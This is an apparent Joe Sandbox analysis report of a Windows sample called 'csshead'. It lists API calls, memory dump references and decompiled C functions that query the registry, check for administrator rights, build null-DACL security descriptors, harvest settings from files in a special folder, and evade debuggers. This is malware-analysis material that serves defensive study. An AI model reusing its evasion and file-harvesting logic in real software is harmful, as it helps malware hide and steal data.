    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 00426368: GetModuleFileNameW.KERNEL32(00000000,00442CAA,00000104,00000001,?,00000000), ref: 00426404
      • Part of subcall function 00426368: _wcslen.LIBCMT ref: 00426433
      • Part of subcall function 00426368: _wcslen.LIBCMT ref: 00426440
      • Part of subcall function 00426368: GetStdHandle.KERNEL32(000000F4,00000001,?,00000000), ref: 004264B6
      • Part of subcall function 00426368: _strlen.LIBCMT ref: 004264F3
      • Part of subcall function 00426368: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00426502
      • Part of subcall function 004243C2: ExitProcess.KERNEL32 ref: 004243D3
    • RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
      • Part of subcall function 00427A95: RtlDecodePointer.NTDLL ref: 00427AA0
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 93%
    			E00407118(void* __ecx) {
    				signed char _v8;
    				void* _v12;
    				char _v16;
    				char* _v20;
    				void* _v24;
    				void* _v28;
    				char _v285;
    				intOrPtr _t23;
    				intOrPtr _t30;
    				void* _t36;
    				intOrPtr _t42;
    				signed int _t45;
    
    				_v8 = 0;
    				_t23 =  *0x40a564; // 0x4070d0
    				_v20 = E00403F38(_t23);
    				RegOpenKeyExA(0x80000002, _v20, 0, 0x20019,  &_v12); // executed
    				E00401440(_v20);
    				_v16 = 0x101;
    				_t30 =  *0x40a568; // 0x4070f0
    				_v24 = E00403F38(_t30);
    				_t36 = E004038B0(_v12, _v24, 0, 0,  &_v285,  &_v16); // executed
    				if(_t36 == 0) {
    					_t42 =  *0x40a56c; // 0x407108
    					_v28 = E00403F38(_t42);
    					_t45 = E00401110( &_v285, _v28);
    					asm("sbb eax, eax");
    					_v8 =  ~(_t45 & 0xffffff00 | _t45 != 0x00000000);
    					E00401440(_v28);
    				}
    				E00401440(_v24);
    				E00403890(_v12);
    				return _v8;
    			}
    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,?), ref: 00407147
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 0042893E: RtlEncodePointer.NTDLL(BBC3D676), ref: 0042894A
    • __initterm_e.LIBCMT ref: 00424479
      • Part of subcall function 0042C3B0: __FindPESection.LIBCMT ref: 0042C40B
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0042AFEF
      • Part of subcall function 00427A95: RtlDecodePointer.NTDLL ref: 00427AA0
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004069BC(void* __edx, void* __eflags) {
    				signed int _v8;
    				signed int* _v12;
    				intOrPtr _v16;
    				char _v273;
    				char _v338;
    				intOrPtr _t24;
    
    				_v8 = 0;
    				E00406904( &_v338); // executed
    				GetTempPathA(0x101,  &_v273);
    				E0040133C( &_v273,  &_v338);
    				_t24 = E004047AC( &_v273,  &_v12); // executed
    				_v16 = _t24;
    				if(_v16 != 0xffffffff) {
    					if(_v16 == 4) {
    						_v8 =  *_v12 ^ 0xcbc3f6a1;
    					}
    					E00401828(_v12);
    				}
    				return _v8;
    			}
    APIs
      • Part of subcall function 00406904: GetComputerNameA.KERNEL32(?,?), ref: 00406927
      • Part of subcall function 00406904: RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00406965
    • GetTempPathA.KERNEL32(00000101,?), ref: 004069E1
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
      • Part of subcall function 004047AC: GetFileSize.KERNEL32(?,00000000), ref: 00404810
      • Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
      • Part of subcall function 004047AC: CloseHandle.KERNEL32(?), ref: 00404849
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • RtlEncodePointer.NTDLL(00000000), ref: 00424957
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004038B0(void* _a4, char* _a8, int* _a12, int* _a16, char* _a20, int* _a24) {
    				long _v8;
    				long _t15;
    
    				_t15 = RegQueryValueExA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
    				_v8 = _t15;
    				return _v8;
    			}
    APIs
    • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 018238B7
    Memory Dump Source
    • Source File: 00000000.00000002.27491633392.01823000.00000040.sdmp, Offset: 01823000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1823000_csshead.jbxd
    APIs
    • RtlEncodePointer.NTDLL(BBC3D676), ref: 0042894A
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,00424C7A), ref: 004276A7
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEncodePointer.NTDLL(Function_0001AEC5), ref: 0042AF4E
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEncodePointer.NTDLL(00000000), ref: 00425D00
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E00406B60(intOrPtr* __eax, void* __ebx, void* __ecx, char* __edx) {
    				intOrPtr* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v32;
    
    				_t43 = __edx;
    				_v8 = __eax;
    				_v24 = 0;
    				_v20 = 0;
    				_v16 = 0;
    				do {
    					E00406B18( &_v32, __ebx, __ecx, _t43);
    					_t43 =  &_v32;
    					E00406A74( &_v24,  &_v32);
    					Sleep(0x1f4); // executed
    					_v16 = _v16 + 1;
    				} while (_v16 != 0xa);
    				_v12 = 0xffffffff;
    				_v28 = 0;
    				_v32 = 0x9c40;
    				 *_v8 = _v24;
    				if(E00406ACC( &_v32,  &_v24) != 0) {
    					_v28 = 0;
    					_v32 = 0xa;
    					if(E00406ACC( &_v24,  &_v32) != 0) {
    						_v12 = 0;
    					}
    				}
    				return _v12;
    			}
    APIs
    • Sleep.KERNELBASE(000001F4), ref: 00406B90
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 0042AFAC: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0042AFEF
    • Sleep.KERNEL32(00000000), ref: 0042A14C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 01820593
    Memory Dump Source
    • Source File: 00000000.00000002.27491620206.01820000.00000040.sdmp, Offset: 01820000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1820000_csshead.jbxd
    APIs
    • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 01823877
    Memory Dump Source
    • Source File: 00000000.00000002.27491633392.01823000.00000040.sdmp, Offset: 01823000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1823000_csshead.jbxd
    APIs
    • VirtualFree.KERNELBASE(?,?,?), ref: 01820560
    Memory Dump Source
    • Source File: 00000000.00000002.27491620206.01820000.00000040.sdmp, Offset: 01820000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1820000_csshead.jbxd
    APIs
    • VirtualFree.KERNELBASE(?,?,?), ref: 01823844
    Memory Dump Source
    • Source File: 00000000.00000002.27491633392.01823000.00000040.sdmp, Offset: 01823000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1823000_csshead.jbxd
    C-Code - Quality: 100%
    			E004013B4(void** __eax, long __edx) {
    				void** _v8;
    				long _v12;
    				void* _t7;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_t7 = VirtualAlloc(0, _v12, 0x3000, 4); // executed
    				 *_v8 = _t7;
    				return _t7;
    			}
    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • GlobalAlloc.KERNELBASE(?,?), ref: 018204FD
    Memory Dump Source
    • Source File: 00000000.00000002.27491620206.01820000.00000040.sdmp, Offset: 01820000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1820000_csshead.jbxd
    APIs
    • GlobalAlloc.KERNELBASE(?,?), ref: 01823781
    Memory Dump Source
    • Source File: 00000000.00000002.27491633392.01823000.00000040.sdmp, Offset: 01823000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1823000_csshead.jbxd
    C-Code - Quality: 100%
    			E00401828(void* __eax) {
    				void* _v8;
    				int _t5;
    
    				_v8 = __eax;
    				_t5 = VirtualFree(_v8, 0, 0x8000); // executed
    				return _t5;
    			}
    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Non-executed Functions

    APIs
    • GetWindowLongA.USER32(?,000000EC), ref: 004181D3
    • GetWindowLongA.USER32(?,000000EC), ref: 004181E3
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 004181EE
    • GetWindowLongA.USER32(?,000000EB), ref: 004181FC
    • OleUninitialize.OLE32 ref: 0041820E
    • OleInitialize.OLE32(00000000), ref: 0041821B
    • GetWindowTextLengthA.USER32(?), ref: 00418222
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • GetWindowTextA.USER32(?,00000000,00000001), ref: 00418279
    • SetWindowTextA.USER32(?,00433C2B), ref: 00418285
    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004182AC
    • GlobalFix.KERNEL32(00000000), ref: 004182B9
    • GlobalUnWire.KERNEL32(00000000), ref: 004182D4
    • SysFreeString.OLEAUT32(00000000), ref: 00418309
    • lstrlen.KERNEL32(00000000), ref: 0041833E
      • Part of subcall function 00410680: SysFreeString.OLEAUT32(00000000), ref: 00410749
      • Part of subcall function 00410680: SysAllocString.OLEAUT32(?), ref: 00410778
    • SysFreeString.OLEAUT32(00000000), ref: 004183FC
    • SetWindowLongA.USER32(?,000000EB,?), ref: 00418421
    • SysFreeString.OLEAUT32(00000000), ref: 00418438
    • NtdllDefWindowProc_A.NTDLL(?,00000000,?,?), ref: 00418462
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetWindowLongA.USER32(?,000000EC), ref: 00417F10
    • GetWindowLongA.USER32(?,000000EC), ref: 00417F23
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
    • GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
    • OleUninitialize.OLE32 ref: 00417F51
    • OleInitialize.OLE32(00000000), ref: 00417F5E
    • GetWindowTextLengthA.USER32(?), ref: 00417F68
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
    • SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
    • GlobalFix.KERNEL32(00000000), ref: 00417FF7
    • GlobalUnWire.KERNEL32(00000000), ref: 00418012
    • lstrlen.KERNEL32(00000000), ref: 00418031
      • Part of subcall function 00410680: SysFreeString.OLEAUT32(00000000), ref: 00410749
      • Part of subcall function 00410680: SysAllocString.OLEAUT32(?), ref: 00410778
    • SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00418176
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetWindowLongA.USER32(?,000000F0), ref: 00420B8F
    • SendMessageA.USER32(000000FF,00000229,00000000,?), ref: 00420BC9
    • GetWindowLongA.USER32(?,000000F0), ref: 00420BD1
    • IsWindowVisible.USER32(?), ref: 00420C04
    • IsIconic.USER32(?), ref: 00420C1C
    • ShowWindow.USER32(?,000000FF), ref: 00420C4A
    • SendMessageA.USER32(000000FF,00000234,00000000,00000000), ref: 00420C6B
    • GetWindowLongA.USER32(?,000000F0), ref: 00420C73
    • SendMessageA.USER32(000000FF,00000229,00000000,00000000), ref: 00420C92
    • SendMessageA.USER32(?,00000224,00000000,00000000), ref: 00420CA7
    • SendMessageA.USER32(000000FF,00000229,00000000,00000000), ref: 00420CB6
    • SendMessageA.USER32(00000000), ref: 00420CEF
      • Part of subcall function 00419340: SendMessageA.USER32(?,00000230,?,00000000), ref: 00419364
      • Part of subcall function 00419340: SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00419373
      • Part of subcall function 00419340: GetParent.USER32(?), ref: 00419379
      • Part of subcall function 00419340: DrawMenuBar.USER32(00000000), ref: 00419380
    • GetParent.USER32(000000FF), ref: 00420CE8
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004041C8(intOrPtr* __eax) {
    				char _v5;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				void* _v24;
    				signed int _v28;
    				int _v32;
    				char _v36;
    				void* _t52;
    
    				 *__eax =  *__eax + __eax;
    				_v5 = 0;
    				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
    				if(_v32 == 0 && GetLastError() == 0x3f0) {
    					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
    				}
    				if(_v32 != 0) {
    					_v16 = E004013DC(0x400);
    					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
    					CloseHandle(_v12);
    					if(_v32 != 0) {
    						AllocateAndInitializeSid(0x40a2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
    						_t52 =  *_v16 - 1;
    						if(_t52 >= 0) {
    							_v36 = _t52 + 1;
    							_v28 = 0;
    							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
    								_v28 = _v28 + 1;
    								_t28 =  &_v36;
    								 *_t28 = _v36 - 1;
    								if( *_t28 != 0) {
    									continue;
    								}
    								goto L11;
    							}
    							_v5 = 1;
    						}
    						L11:
    						FreeSid(_v24);
    					}
    					E00401440(_v16);
    				}
    				return _v5;
    			}
    APIs
    • GetCurrentThread.KERNEL32 ref: 004041DE
    • OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
    • GetLastError.KERNEL32 ref: 004041F4
    • GetCurrentProcess.KERNEL32 ref: 00404207
    • OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
    • GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
    • CloseHandle.KERNEL32(?), ref: 0040424E
    • AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
    • EqualSid.ADVAPI32(?,?), ref: 004042A2
    • FreeSid.ADVAPI32(?), ref: 004042BE
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00423A06
    • GetSystemInfo.KERNEL32(?), ref: 00423A1E
    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00423A2E
    • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00423A3E
    • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 00423A90
    • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 00423AA5
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsDebuggerPresent.KERNEL32 ref: 0042FAF6
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
    • UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
    • GetCurrentProcess.KERNEL32 ref: 0042FB32
    • TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 64%
    			E00404406(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
    				intOrPtr* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				struct _ACL* _v16;
    				void* _v20;
    				int _v24;
    				int _v28;
    				struct _ACL* _v32;
    				intOrPtr _t37;
    				signed int _t38;
    				signed int _t50;
    				signed int _t59;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
    					_t37 =  *0x40a0d4; // 0x401cb4
    					_t38 =  *0x40b32c(_t37, 1,  &_v20, 0);
    					asm("sbb eax, eax");
    					if( ~( ~_t38) == 0) {
    						_v20 = 0xffffffff;
    					} else {
    						_v32 = 0;
    						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
    						asm("sbb eax, eax");
    						if( ~( ~_t50) == 0) {
    							L6:
    							LocalFree(_v20);
    							_v20 = 0xffffffff;
    						} else {
    							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
    							asm("sbb eax, eax");
    							if( ~( ~_t59) == 0) {
    								goto L6;
    							}
    						}
    					}
    					if(_v8 != 0) {
    						 *_v8 = 0xc;
    						 *(_v8 + 4) = _v12;
    						 *((intOrPtr*)(_v8 + 8)) = 0;
    					}
    					_v16 = _v20;
    				}
    				return _v16;
    			}

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040441F
    • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00404437
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401CB4,00000001,?,00000000), ref: 00404453
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404478
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404498
    • LocalFree.KERNEL32(?), ref: 004044AC
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 91%
    			E00405640(char* __eax, void* __ecx, void* __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				char _v20;
    				intOrPtr _v24;
    				char* _v28;
    				char* _v32;
    				struct _WIN32_FIND_DATAA _v352;
    				char _v609;
    				char _v866;
    				intOrPtr _t68;
    				int _t81;
    				intOrPtr _t89;
    				intOrPtr _t127;
    				intOrPtr _t128;
    				intOrPtr _t131;
    				void* _t133;
    				void* _t134;
    				void* _t135;
    
    				_v8 = __eax;
    				_v12 = 0;
    				 *_v8 = 0;
    				 *0x40b21c(0,  &_v609, 0x1a, 0xffffffff);
    				_t68 =  *0x40a188; // 0x401e60
    				E0040133C( &_v609, _t68);
    				_t135 = _t134 + 8;
    				_v352.dwFileAttributes = 0x80;
    				_v16 = FindFirstFileA( &_v609,  &_v352);
    				 *((char*)(_t133 + E004012DC( &_v609) - 0x25e)) = 0;
    				if(_v16 == 0xffffffff) {
    					L12:
    					FindClose(_v16);
    					return _v12;
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					if(_v352.cFileName == 0x2e) {
    						goto L11;
    					}
    					E00401308( &_v866,  &_v609);
    					E0040133C( &_v866,  &(_v352.cFileName));
    					_t89 =  *0x40a178; // 0x401e20
    					E0040133C( &_v866, _t89);
    					_t135 = _t135 + 0x10;
    					if(E00403988( &_v866) == 0) {
    						goto L11;
    					}
    					_v24 = E004047AC( &_v866,  &_v20);
    					if(_v24 <= 0) {
    						goto L11;
    					}
    					 *((char*)(_v20 + _v24)) = 0;
    					_t127 =  *0x40a17c; // 0x401e2c
    					_v28 = E00401110(_v20, _t127);
    					if(_v28 == 0) {
    						E00401828(_v20);
    						goto L11;
    					}
    					_v28 = _v28 + 0xd;
    					if( *_v28 == 0x31) {
    						_t128 =  *0x40a180; // 0x401e3c
    						_v28 = E00401110(_v20, _t128);
    						if(_v28 != 0) {
    							_v28 = _v28 + 0xe;
    							_v32 = E00401110(_v28, E0040584C);
    							 *_v32 = 0;
    							E00401308(_v8, _v28);
    							 *_v32 = 0x22;
    							_t131 =  *0x40a184; // 0x401e4c
    							_v28 = E00401110(_v20, _t131);
    							if(_v28 != 0) {
    								_v28 = _v28 + 0x12;
    								_v32 = E00401110(_v28, 0x405850);
    								 *_v32 = 0;
    								E0040133C(_v8, 0x405854);
    								E0040133C(_v8, _v28);
    								_v12 = 0xffffffff;
    							}
    						}
    					}
    					E00401828(_v20);
    					goto L12;
    					L11:
    					_t81 = FindNextFileA(_v16,  &_v352);
    					asm("sbb eax, eax");
    				} while ( ~( ~_t81) != 0);
    				goto L12;
    			}

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00405664
    • FindFirstFileA.KERNEL32(?,00000080), ref: 00405697
      • Part of subcall function 00403988: FindFirstFileA.KERNEL32(?,?), ref: 004039A4
      • Part of subcall function 00403988: FindClose.KERNEL32(000000FF), ref: 004039BF
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
      • Part of subcall function 004047AC: GetFileSize.KERNEL32(?,00000000), ref: 00404810
      • Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
      • Part of subcall function 004047AC: CloseHandle.KERNEL32(?), ref: 00404849
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • FindNextFileA.KERNEL32(000000FF,00000080), ref: 00405825
    • FindClose.KERNEL32(000000FF), ref: 0040583D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
